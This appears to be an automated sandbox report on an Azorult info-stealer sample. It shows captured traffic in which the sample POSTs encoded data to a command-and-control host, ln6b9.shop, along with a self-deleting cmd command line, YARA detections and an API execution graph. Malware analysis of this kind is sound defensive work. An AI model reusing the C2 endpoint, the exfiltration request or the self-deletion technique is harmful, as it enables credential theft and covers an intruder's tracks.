                                    Aug 29, 2024 12:02:33.484428883 CEST1236INData Raw: c9 cd 3b 7f 60 67 60 aa cc 31 9f 06 d5 fb 75 64 22 60 6d 84 cd 31 9b 07 9a fb 31 d2 5e 0e 11 db bb 0a b1 2d ea bc 44 7a 0b 0f 06 dd a4 43 f1 64 e9 e5 50 3b 0b 49 15 c4 a2 1f fd 67 ef bf 40 7b 2b 0f 06 dd a4 43 f1 64 e9 99 5c 3b 12 25 00 dd bf 1e
                                    Data Ascii: ;`g`1ud"`m11^-DzCdP;Ig@{+Cd\;%p>RoLM6Tegi<u%]/9pmF=!QcG8?cej'e*<kVntKnfS/~i3;T}s1Wms(KRZQ!z;-l3
                                    Aug 29, 2024 12:02:33.484641075 CEST1236INData Raw: 89 e8 07 ac bf 34 23 df c1 dd de f9 eb 30 80 7f d6 a5 50 1c c4 00 95 04 9e 9e 2e 5b 62 62 66 ad ca b6 ae 12 9b c2 18 52 67 62 64 2d fc 25 9f 06 9e c9 32 54 56 e7 fd a9 c8 65 83 21 99 4a a3 64 e7 eb e5 bb c5 9c 1c 62 dd 9d 14 c3 83 43 76 53 e1 d1
                                    Data Ascii: 4#0P.[bbfRgbd-%2TVe!JdbCvSQo5^oC&Xf%Wr1Z7D/5W3bf}a@;E_"A D"G<{0hjVd6`f/K%Mv{I]a@
                                    Aug 29, 2024 12:02:33.484652042 CEST1236INData Raw: a4 9d 46 0e 34 13 32 f5 aa 55 f8 30 f8 f9 01 06 15 53 51 92 fb 6a 98 08 b6 cd 32 50 67 e4 52 ad ca 3c af 4e ad 81 93 70 e6 44 65 e2 cb 59 9e 61 9d b9 33 3b 66 15 65 c0 cb 56 9e 76 9d eb 33 03 66 0f 65 c1 cb 54 9e 6d 9d bc 33 27 c7 44 e5 8f a3 44
                                    Data Ascii: F42U0SQj2PgR<NpDeYa3;feVv3feTm3'DDr#KSmU HGlD'Vkcj2UgceI1Vs8&t&A0Swp=wvZYfQ-,.-:]n4niCDnab/ACUVC5
                                    Aug 29, 2024 12:02:33.484666109 CEST1236INData Raw: f4 a4 5d 65 4e 56 43 a9 c8 65 9a 01 8e d4 7e 3d 05 14 0a dc a4 56 ea 22 de a4 57 31 46 35 0c c8 a5 59 f0 65 bd 9b 70 15 46 54 55 9e fb 00 80 15 90 fa 05 65 57 57 52 9d fa 05 a7 33 ae 91 24 59 57 5e 55 9d fa 07 ac 33 a8 f2 02 67 3c 56 e4 2d fa 3b
                                    Data Ascii: ]eNVCe~=V"W1F5YepFTUeWWR3$YW^U3g<V-;fP`ug20bnvQjT T>4Ga4_fH`e0#OA;spA5<fPmufs5W3bf}a@;EBmG=U-.1UifU-:3
                                    Aug 29, 2024 12:02:33.489465952 CEST1236INData Raw: e9 a4 5d 65 76 56 6b a9 c8 65 9a 05 8e cc 61 31 02 0b 0a c1 af 01 80 32 81 cd 30 01 62 6c 76 ba 86 59 fd 70 f2 b8 5c 32 12 46 26 c0 b9 40 f1 70 fc bf 5a 3b 08 57 57 9f fb 36 9d 57 99 c8 20 7d 2b 0f 06 dd a4 43 f1 64 e9 eb 61 3b 09 12 45 ec ae 42
                                    Data Ascii: ]evVkea120blvYp\2F&@pZ;WW6W }+Cda;EBkP5EDmG-FTUdQVS3$YTSU2c<V7Rud0#fPnuoCkG;Wu6W S4^3/Re3a%k\'_rR 7Wuy(BqG


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.649718172.67.128.117804396C:\Windows\SysWOW64\svchost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 29, 2024 12:02:38.497904062 CEST165OUTPOST /LN341/index.php HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: ln6b9.shop
                                    Content-Length: 33917
                                    Cache-Control: no-cache
                                    Aug 29, 2024 12:02:38.497967005 CEST11124OUTData Raw: 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30
                                    Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;)0d0e10eT<g:pp3p2p3p3w0s'p0{p5p7)0d0f0m0b0g0bf;j;f'&fp3)0e&f&fBg64.b;4g0x4.a66:l
                                    Aug 29, 2024 12:02:38.502764940 CEST1236OUTData Raw: 52 01 ea 40 18 ef 51 1e e8 4d 1e ed 56 0f e1 49 1f ed 56 17 ea 45 0f e7 52 10 ed 4a 04 fd 41 0f f9 44 12 e9 5a 0d e4 48 0d ec 4c 1f e3 50 11 f8 49 05 e8 44 0d e0 41 19 ef 55 1e ff 4f 10 fc 40 01 e7 4f 07 e2 4d 1a ea 54 1a e6 56 1d ef 4b 00 e5 5b
                                    Data Ascii: R@QMVIVERJADZHLPIDAUO@OMTVK[ZKVURD@NUAPPTUEU[MMDNPLRWZYNDDVBMIBGOFRVIAZWZEEOJDSK[
                                    Aug 29, 2024 12:02:38.502820969 CEST4944OUTData Raw: 47 07 fa 55 16 e0 4f 1c fd 44 1f e8 55 04 fc 56 01 e3 59 11 f7 53 00 f7 41 14 eb 42 06 f4 40 06 eb 56 03 e6 54 07 e7 52 11 eb 49 1c f4 52 04 e6 49 1b fa 4a 1c e7 40 13 e3 4e 05 f8 4f 0d e1 4a 03 fa 53 16 fa 47 1e e8 53 11 f8 54 0d fd 41 0d f4 47
                                    Data Ascii: GUODUVYSAB@VTRIRIJ@NOJSGSTAGVINLNBIGIN[UA[A[NZFBB[HDB@HZWTWIWRDJDKUSZFHOJAIAIHREA
                                    Aug 29, 2024 12:02:38.502911091 CEST4944OUTData Raw: 57 04 e0 59 1f e4 48 06 e5 41 06 e1 4d 05 e4 56 1e fc 42 06 f4 55 1b e2 4a 0d e7 4e 03 e8 4b 19 ec 59 18 e3 52 17 fc 52 18 ef 47 07 e5 47 1c fb 4e 10 eb 44 11 fb 4d 1c fd 45 00 ff 4a 10 ed 47 0f ed 51 1d fd 51 07 f7 59 05 e9 48 1f f8 5b 1f e1 54
                                    Data Ascii: WYHAMVBUJNKYRRGGNDMEJGQQYH[TGESJBWBWPALZHBPWWOPAGALQYKBZQMSBGZKYTJBBMAVTN@HAMLNK@
                                    Aug 29, 2024 12:02:38.503031969 CEST2472OUTData Raw: 57 16 fe 51 05 ff 56 0d f6 47 1b e5 54 1b f7 50 1b fa 4d 02 eb 59 14 f8 50 00 e3 53 01 e1 52 17 fa 42 18 f8 44 07 e7 4e 05 ed 4a 1d e2 55 0f ea 48 0d e1 49 1d fc 56 12 ed 56 16 f7 40 16 e9 50 1e f7 59 13 e6 4f 1b fc 4c 14 eb 57 10 fd 42 03 f4 4b
                                    Data Ascii: WQVGTPMYPSRBDNJUHIVV@PYOLWBKPDNT@PQJPQVNOFYEV@NVG@EFEGAHQYXSAUUU#.QWUUE<f&1OVR_JPFg:{J
                                    Aug 29, 2024 12:02:38.503164053 CEST2472OUTData Raw: 52 07 f6 4e 12 f6 41 1b e3 42 1d e9 4c 11 ed 57 03 e0 42 1d ff 4b 0f e3 49 0c e7 5a 0d e2 57 03 ea 4e 10 ef 55 10 f6 50 02 e8 52 16 ea 55 05 fc 50 06 e2 51 10 e7 57 0c e3 54 1d fb 5b 03 f8 48 19 fe 49 0d ff 49 1a e6 5a 05 ef 55 0c f6 50 1c e3 41
                                    Data Ascii: RNABLWBKIZWNUPRUPQWT[HIIZUPAWZMUYJG[KOVHYFVAHRE@JLDBTSLNJAJF[QVVVARW[BUFRMR@VZFJW
                                    Aug 29, 2024 12:02:38.503249884 CEST6725OUTData Raw: 33 75 ee 23 67 80 37 65 8e 44 1d d4 0e 5f ed 53 00 8e 40 3a db 6d 21 94 23 61 a3 09 12 cb 77 07 ef 4e 6f 8e 3b 64 97 32 58 a4 55 3c ca 66 3a 8e 4a 3b c8 6c 58 a4 4e 3c cd 71 3a dd 6c 33 da 23 17 cf 70 3c cd 23 11 c7 70 25 c2 62 2c 8e 42 31 cf 73
                                    Data Ascii: 3u#g7eD_S@:m!#awNo;d2XU<f:J;lXN<q:l3#p<#p%b,B1s!qX_XXp!nuq:f&^Xp!nX\f2p!zX\n&-0fX\f8q,@:s'p&l;6q&-0fXt<j;w{{0\f'j6p{{0\p#k:w{{0\b'N0vs0j0`0
                                    Aug 29, 2024 12:02:38.525331020 CEST1236OUTData Raw: dd 5f 64 f2 49 11 ea 4b 18 fe 40 11 fb 49 09 f4 4a 05 f6 5a 0d f9 4a 1a f7 2d 2d c2 70 2d fe 48 54 ac 0d 55 a0 03 55 ae 03 55 ae 03 55 ae 18 af 72 3b 57 aa 03 55 ac 07 55 ae 14 55 ae 03 55 ae 03 55 af 03 75 ae 03 55 78 31 55 ae 45 3c c2 66 26 f2
                                    Data Ascii: _dIK@IJZJ--p-HTUUUUr;WUUUUUuUx1UE<f&1GNG-1`-HTUUUU>uWUUUUUuU4UE<f&1OVR-1`-HTUUUUbWUUUUUuU8UE<f&1@OJ--p-HTU
                                    Aug 29, 2024 12:02:42.497951031 CEST625INHTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 10:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/5.6.37
                                    Vary: User-Agent
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zwm8DSp7LM6QMnW%2FR%2BCl5DSTCOloaaKYu%2FLUeCIE0WGPGBTRR2CPCjv9BsMjOxqy6W20eSP26UDYMDbT9xcyC14c3RFK4ywZa2aN4CP6VSwsmehAvA4VrwFlJKh4"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8babb4e91fd9b9c5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 7falseOK0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:06:02:29
                                    Start date:29/08/2024
                                    Path:C:\Users\user\Desktop\Po#70831.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Po#70831.exe"
                                    Imagebase:0x490000
                                    File size:1'295'872 bytes
                                    MD5 hash:BDE0B7FF5003DA14DF7675564D5A8F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:06:02:30
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Po#70831.exe"
                                    Imagebase:0xe50000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\timeout.exe 3
                                    Imagebase:0xe20000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.2%
                                      Dynamic/Decrypted Code Coverage:0.9%
                                      Signature Coverage:4.7%
                                      Total number of Nodes:1953
                                      Total number of Limit Nodes:50
                                      execution_graph 95111 491cad SystemParametersInfoW 95112 4d2ba5 95113 4d2baf 95112->95113 95114 492b25 95112->95114 95155 493a5a 95113->95155 95140 492b83 7 API calls 95114->95140 95118 4d2bb8 95162 499cb3 95118->95162 95121 492b2f 95127 492b44 95121->95127 95144 493837 95121->95144 95122 4d2bc6 95123 4d2bce 95122->95123 95124 4d2bf5 95122->95124 95168 4933c6 95123->95168 95126 4933c6 22 API calls 95124->95126 95129 4d2bf1 GetForegroundWindow ShellExecuteW 95126->95129 95132 492b5f 95127->95132 95154 4930f2 Shell_NotifyIconW ___scrt_fastfail 95127->95154 95134 4d2c26 95129->95134 95137 492b66 SetCurrentDirectoryW 95132->95137 95134->95132 95139 492b7a 95137->95139 95138 4933c6 22 API calls 95138->95129 95186 492cd4 7 API calls 95140->95186 95142 492b2a 95143 492c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95142->95143 95143->95121 95145 493862 ___scrt_fastfail 95144->95145 95187 494212 95145->95187 95148 4938e8 95150 4d3386 Shell_NotifyIconW 95148->95150 95151 493906 Shell_NotifyIconW 95148->95151 95191 493923 95151->95191 95153 49391c 95153->95127 95154->95132 95281 4d1f50 95155->95281 95158 499cb3 22 API calls 95159 493a8d 95158->95159 95283 493aa2 95159->95283 95161 493a97 95161->95118 95163 499cc2 _wcslen 95162->95163 95164 4afe0b 22 API calls 95163->95164 95165 499cea __fread_nolock 95164->95165 95166 4afddb 22 API calls 95165->95166 95167 499d00 95166->95167 95167->95122 95169 4933dd 95168->95169 95170 4d30bb 95168->95170 95303 4933ee 95169->95303 95172 4afddb 22 API calls 95170->95172 95174 4d30c5 _wcslen 95172->95174 95173 4933e8 95177 496350 95173->95177 95175 4afe0b 22 API calls 95174->95175 95176 4d30fe __fread_nolock 95175->95176 95178 496362 95177->95178 95179 4d4a51 95177->95179 95318 496373 95178->95318 95328 494a88 22 API calls __fread_nolock 95179->95328 95182 4d4a5b 95184 4d4a67 95182->95184 95185 49a8c7 22 API calls 95182->95185 95183 49636e 95183->95138 95185->95184 95186->95142 95188 4d35a4 95187->95188 95189 4938b7 95187->95189 95188->95189 95190 4d35ad DestroyIcon 95188->95190 95189->95148 95213 4fc874 42 API calls _strftime 95189->95213 95190->95189 95192 49393f 95191->95192 95193 493a13 95191->95193 95214 496270 95192->95214 95193->95153 95196 49395a 95219 496b57 95196->95219 95197 4d3393 LoadStringW 95199 4d33ad 95197->95199 95207 493994 ___scrt_fastfail 95199->95207 95231 49a8c7 95199->95231 95200 49396f 95201 4d33c9 95200->95201 95202 49397c 95200->95202 95205 496350 22 API calls 95201->95205 95202->95199 95204 493986 95202->95204 95206 496350 22 API calls 95204->95206 95208 4d33d7 95205->95208 95206->95207 95210 4939f9 Shell_NotifyIconW 95207->95210 95208->95207 95209 4933c6 22 API calls 95208->95209 95211 4d33f9 95209->95211 95210->95193 95212 4933c6 22 API calls 95211->95212 95212->95207 95213->95148 95235 4afe0b 95214->95235 95216 496295 95245 4afddb 95216->95245 95218 49394d 95218->95196 95218->95197 95220 4d4ba1 95219->95220 95221 496b67 _wcslen 95219->95221 95271 4993b2 95220->95271 95224 496b7d 95221->95224 95225 496ba2 95221->95225 95223 4d4baa 95223->95223 95270 496f34 22 API calls 95224->95270 95226 4afddb 22 API calls 95225->95226 95228 496bae 95226->95228 95230 4afe0b 22 API calls 95228->95230 95229 496b85 __fread_nolock 95229->95200 95230->95229 95232 49a8ea __fread_nolock 95231->95232 95233 49a8db 95231->95233 95232->95207 95233->95232 95234 4afe0b 22 API calls 95233->95234 95234->95232 95238 4afddb 95235->95238 95237 4afdfa 95237->95216 95238->95237 95240 4afdfc 95238->95240 95255 4bea0c 95238->95255 95262 4b4ead 7 API calls 2 library calls 95238->95262 95241 4b066d 95240->95241 95263 4b32a4 RaiseException 95240->95263 95264 4b32a4 RaiseException 95241->95264 95244 4b068a 95244->95216 95248 4afde0 95245->95248 95246 4bea0c ___std_exception_copy 21 API calls 95246->95248 95247 4afdfa 95247->95218 95248->95246 95248->95247 95251 4afdfc 95248->95251 95267 4b4ead 7 API calls 2 library calls 95248->95267 95250 4b066d 95269 4b32a4 RaiseException 95250->95269 95251->95250 95268 4b32a4 RaiseException 95251->95268 95254 4b068a 95254->95218 95260 4c3820 _abort 95255->95260 95256 4c385e 95266 4bf2d9 20 API calls _abort 95256->95266 95257 4c3849 RtlAllocateHeap 95259 4c385c 95257->95259 95257->95260 95259->95238 95260->95256 95260->95257 95265 4b4ead 7 API calls 2 library calls 95260->95265 95262->95238 95263->95241 95264->95244 95265->95260 95266->95259 95267->95248 95268->95250 95269->95254 95270->95229 95272 4993c0 95271->95272 95274 4993c9 __fread_nolock 95271->95274 95272->95274 95275 49aec9 95272->95275 95274->95223 95276 49aedc 95275->95276 95280 49aed9 __fread_nolock 95275->95280 95277 4afddb 22 API calls 95276->95277 95278 49aee7 95277->95278 95279 4afe0b 22 API calls 95278->95279 95279->95280 95280->95274 95282 493a67 GetModuleFileNameW 95281->95282 95282->95158 95284 4d1f50 __wsopen_s 95283->95284 95285 493aaf GetFullPathNameW 95284->95285 95286 493ae9 95285->95286 95287 493ace 95285->95287 95297 49a6c3 95286->95297 95288 496b57 22 API calls 95287->95288 95290 493ada 95288->95290 95293 4937a0 95290->95293 95294 4937ae 95293->95294 95295 4993b2 22 API calls 95294->95295 95296 4937c2 95295->95296 95296->95161 95298 49a6dd 95297->95298 95299 49a6d0 95297->95299 95300 4afddb 22 API calls 95298->95300 95299->95290 95301 49a6e7 95300->95301 95302 4afe0b 22 API calls 95301->95302 95302->95299 95304 4933fe _wcslen 95303->95304 95305 4d311d 95304->95305 95306 493411 95304->95306 95308 4afddb 22 API calls 95305->95308 95313 49a587 95306->95313 95310 4d3127 95308->95310 95309 49341e __fread_nolock 95309->95173 95311 4afe0b 22 API calls 95310->95311 95312 4d3157 __fread_nolock 95311->95312 95314 49a59d 95313->95314 95317 49a598 __fread_nolock 95313->95317 95315 4afe0b 22 API calls 95314->95315 95316 4df80f 95314->95316 95315->95317 95317->95309 95319 496382 95318->95319 95324 4963b6 __fread_nolock 95318->95324 95320 4d4a82 95319->95320 95321 4963a9 95319->95321 95319->95324 95322 4afddb 22 API calls 95320->95322 95323 49a587 22 API calls 95321->95323 95325 4d4a91 95322->95325 95323->95324 95324->95183 95326 4afe0b 22 API calls 95325->95326 95327 4d4ac5 __fread_nolock 95326->95327 95328->95182 95329 492de3 95330 492df0 __wsopen_s 95329->95330 95331 492e09 95330->95331 95333 4d2c2b ___scrt_fastfail 95330->95333 95332 493aa2 23 API calls 95331->95332 95334 492e12 95332->95334 95335 4d2c47 GetOpenFileNameW 95333->95335 95345 492da5 95334->95345 95337 4d2c96 95335->95337 95338 496b57 22 API calls 95337->95338 95340 4d2cab 95338->95340 95340->95340 95342 492e27 95363 4944a8 95342->95363 95346 4d1f50 __wsopen_s 95345->95346 95347 492db2 GetLongPathNameW 95346->95347 95348 496b57 22 API calls 95347->95348 95349 492dda 95348->95349 95350 493598 95349->95350 95392 49a961 95350->95392 95353 493aa2 23 API calls 95354 4935b5 95353->95354 95355 4935c0 95354->95355 95359 4d32eb 95354->95359 95397 49515f 95355->95397 95360 4d330d 95359->95360 95409 4ace60 41 API calls 95359->95409 95362 4935df 95362->95342 95410 494ecb 95363->95410 95366 4d3833 95432 502cf9 95366->95432 95368 494ecb 94 API calls 95370 4944e1 95368->95370 95369 4d3848 95372 4d384c 95369->95372 95373 4d3869 95369->95373 95370->95366 95371 4944e9 95370->95371 95374 4d3854 95371->95374 95375 4944f5 95371->95375 95476 494f39 95372->95476 95377 4afe0b 22 API calls 95373->95377 95482 4fda5a 82 API calls 95374->95482 95475 49940c 136 API calls 2 library calls 95375->95475 95391 4d38ae 95377->95391 95380 492e31 95381 4d3862 95381->95373 95382 494f39 68 API calls 95385 4d3a5f 95382->95385 95385->95382 95485 4f989b 82 API calls __wsopen_s 95385->95485 95388 499cb3 22 API calls 95388->95391 95391->95385 95391->95388 95458 4f967e 95391->95458 95461 49a4a1 95391->95461 95469 493ff7 95391->95469 95483 4f95ad 42 API calls _wcslen 95391->95483 95484 500b5a 22 API calls 95391->95484 95393 4afe0b 22 API calls 95392->95393 95394 49a976 95393->95394 95395 4afddb 22 API calls 95394->95395 95396 4935aa 95395->95396 95396->95353 95398 49516e 95397->95398 95402 49518f __fread_nolock 95397->95402 95401 4afe0b 22 API calls 95398->95401 95399 4afddb 22 API calls 95400 4935cc 95399->95400 95403 4935f3 95400->95403 95401->95402 95402->95399 95404 493605 95403->95404 95408 493624 __fread_nolock 95403->95408 95407 4afe0b 22 API calls 95404->95407 95405 4afddb 22 API calls 95406 49363b 95405->95406 95406->95362 95407->95408 95408->95405 95409->95359 95486 494e90 LoadLibraryA 95410->95486 95415 4d3ccf 95417 494f39 68 API calls 95415->95417 95416 494ef6 LoadLibraryExW 95494 494e59 LoadLibraryA 95416->95494 95419 4d3cd6 95417->95419 95421 494e59 3 API calls 95419->95421 95423 4d3cde 95421->95423 95516 4950f5 95423->95516 95424 494f20 95424->95423 95425 494f2c 95424->95425 95427 494f39 68 API calls 95425->95427 95429 4944cd 95427->95429 95429->95366 95429->95368 95431 4d3d05 95433 502d15 95432->95433 95434 49511f 64 API calls 95433->95434 95435 502d29 95434->95435 95787 502e66 95435->95787 95438 502d3f 95438->95369 95439 4950f5 40 API calls 95440 502d56 95439->95440 95441 4950f5 40 API calls 95440->95441 95442 502d66 95441->95442 95443 4950f5 40 API calls 95442->95443 95444 502d81 95443->95444 95445 4950f5 40 API calls 95444->95445 95446 502d9c 95445->95446 95447 49511f 64 API calls 95446->95447 95448 502db3 95447->95448 95449 4bea0c ___std_exception_copy 21 API calls 95448->95449 95450 502dba 95449->95450 95451 4bea0c ___std_exception_copy 21 API calls 95450->95451 95452 502dc4 95451->95452 95453 4950f5 40 API calls 95452->95453 95454 502dd8 95453->95454 95455 5028fe 27 API calls 95454->95455 95456 502dee 95455->95456 95456->95438 95793 5022ce 95456->95793 95459 4afe0b 22 API calls 95458->95459 95460 4f96ae __fread_nolock 95459->95460 95460->95391 95462 49a52b 95461->95462 95467 49a4b1 __fread_nolock 95461->95467 95465 4afe0b 22 API calls 95462->95465 95463 4afddb 22 API calls 95464 49a4b8 95463->95464 95466 4afddb 22 API calls 95464->95466 95468 49a4d6 95464->95468 95465->95467 95466->95468 95467->95463 95468->95391 95470 49400a 95469->95470 95473 4940ae 95469->95473 95472 4afe0b 22 API calls 95470->95472 95474 49403c 95470->95474 95471 4afddb 22 API calls 95471->95474 95472->95474 95473->95391 95474->95471 95474->95473 95475->95380 95477 494f43 95476->95477 95478 494f4a 95476->95478 95479 4be678 67 API calls 95477->95479 95480 494f59 95478->95480 95481 494f6a FreeLibrary 95478->95481 95479->95478 95480->95374 95481->95480 95482->95381 95483->95391 95484->95391 95485->95385 95487 494ea8 GetProcAddress 95486->95487 95488 494ec6 95486->95488 95489 494eb8 95487->95489 95491 4be5eb 95488->95491 95489->95488 95490 494ebf FreeLibrary 95489->95490 95490->95488 95524 4be52a 95491->95524 95493 494eea 95493->95415 95493->95416 95495 494e8d 95494->95495 95496 494e6e GetProcAddress 95494->95496 95499 494f80 95495->95499 95497 494e7e 95496->95497 95497->95495 95498 494e86 FreeLibrary 95497->95498 95498->95495 95500 4afe0b 22 API calls 95499->95500 95501 494f95 95500->95501 95592 495722 95501->95592 95503 494fa1 __fread_nolock 95504 4d3d1d 95503->95504 95505 4950a5 95503->95505 95515 494fdc 95503->95515 95606 50304d 74 API calls 95504->95606 95595 4942a2 CreateStreamOnHGlobal 95505->95595 95508 4d3d22 95510 49511f 64 API calls 95508->95510 95509 4950f5 40 API calls 95509->95515 95511 4d3d45 95510->95511 95512 4950f5 40 API calls 95511->95512 95514 49506e messages 95512->95514 95514->95424 95515->95508 95515->95509 95515->95514 95601 49511f 95515->95601 95517 4d3d70 95516->95517 95518 495107 95516->95518 95628 4be8c4 95518->95628 95521 5028fe 95770 50274e 95521->95770 95523 502919 95523->95431 95525 4be536 CallCatchBlock 95524->95525 95526 4be544 95525->95526 95529 4be574 95525->95529 95549 4bf2d9 20 API calls _abort 95526->95549 95528 4be549 95550 4c27ec 26 API calls pre_c_initialization 95528->95550 95531 4be579 95529->95531 95532 4be586 95529->95532 95551 4bf2d9 20 API calls _abort 95531->95551 95541 4c8061 95532->95541 95535 4be58f 95536 4be5a2 95535->95536 95537 4be595 95535->95537 95553 4be5d4 LeaveCriticalSection __fread_nolock 95536->95553 95552 4bf2d9 20 API calls _abort 95537->95552 95539 4be554 __wsopen_s 95539->95493 95542 4c806d CallCatchBlock 95541->95542 95554 4c2f5e EnterCriticalSection 95542->95554 95544 4c807b 95555 4c80fb 95544->95555 95548 4c80ac __wsopen_s 95548->95535 95549->95528 95550->95539 95551->95539 95552->95539 95553->95539 95554->95544 95561 4c811e 95555->95561 95556 4c8177 95573 4c4c7d 95556->95573 95561->95556 95561->95561 95567 4c8088 95561->95567 95571 4b918d EnterCriticalSection 95561->95571 95572 4b91a1 LeaveCriticalSection 95561->95572 95562 4c8189 95562->95567 95586 4c3405 11 API calls 2 library calls 95562->95586 95564 4c81a8 95587 4b918d EnterCriticalSection 95564->95587 95568 4c80b7 95567->95568 95591 4c2fa6 LeaveCriticalSection 95568->95591 95570 4c80be 95570->95548 95571->95561 95572->95561 95578 4c4c8a _abort 95573->95578 95574 4c4cca 95589 4bf2d9 20 API calls _abort 95574->95589 95575 4c4cb5 RtlAllocateHeap 95576 4c4cc8 95575->95576 95575->95578 95580 4c29c8 95576->95580 95578->95574 95578->95575 95588 4b4ead 7 API calls 2 library calls 95578->95588 95581 4c29fc __dosmaperr 95580->95581 95582 4c29d3 RtlFreeHeap 95580->95582 95581->95562 95582->95581 95583 4c29e8 95582->95583 95590 4bf2d9 20 API calls _abort 95583->95590 95585 4c29ee GetLastError 95585->95581 95586->95564 